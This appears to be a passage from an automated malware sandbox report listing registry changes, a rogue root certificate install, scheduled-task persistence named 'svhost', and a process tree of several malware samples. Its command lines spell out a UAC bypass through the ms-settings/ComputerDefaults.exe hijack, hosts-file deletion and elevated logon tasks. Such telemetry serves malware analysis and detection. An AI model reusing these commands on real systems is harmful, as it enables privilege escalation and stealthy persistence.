| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\System32\WScript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ = "ILodopX" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID\ = "Lodop.LodopX" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\MountTaiSoftware\\Lodop\\CAOSOFT_WEB_PRINT_lodop.ocx,0" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\1998.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\FLAGS\ = "2" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED} | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E} | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0 | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib\Version = "6.0" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA} | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\0\ = "Properties,0,2" | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\Files\frap.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB} | C:\Users\Admin\Desktop\Files\install_lodop32.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\Desktop\Files\windowsexecutable.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\Desktop\Files\windowsexecutable.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\IMG001.exe\:P:$DATA | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P | C:\Windows\SysWOW64\cmd.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Runs net.exe
Runs ping.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\a\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\a\caspol.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Users\Admin\Desktop\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\a\fHR9z2C.exe
"C:\Users\Admin\Desktop\a\fHR9z2C.exe"
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1998.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1998.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\1998.vbs
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\1998.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8504.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8504.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\8504.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\8504.vbs
C:\Users\Admin\Desktop\Files\built.exe
"C:\Users\Admin\Desktop\Files\built.exe"
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cjlDDzoa4tYZ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4284.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4284.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4284.vbs
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\4284.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RW4i2n0v4jZt.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
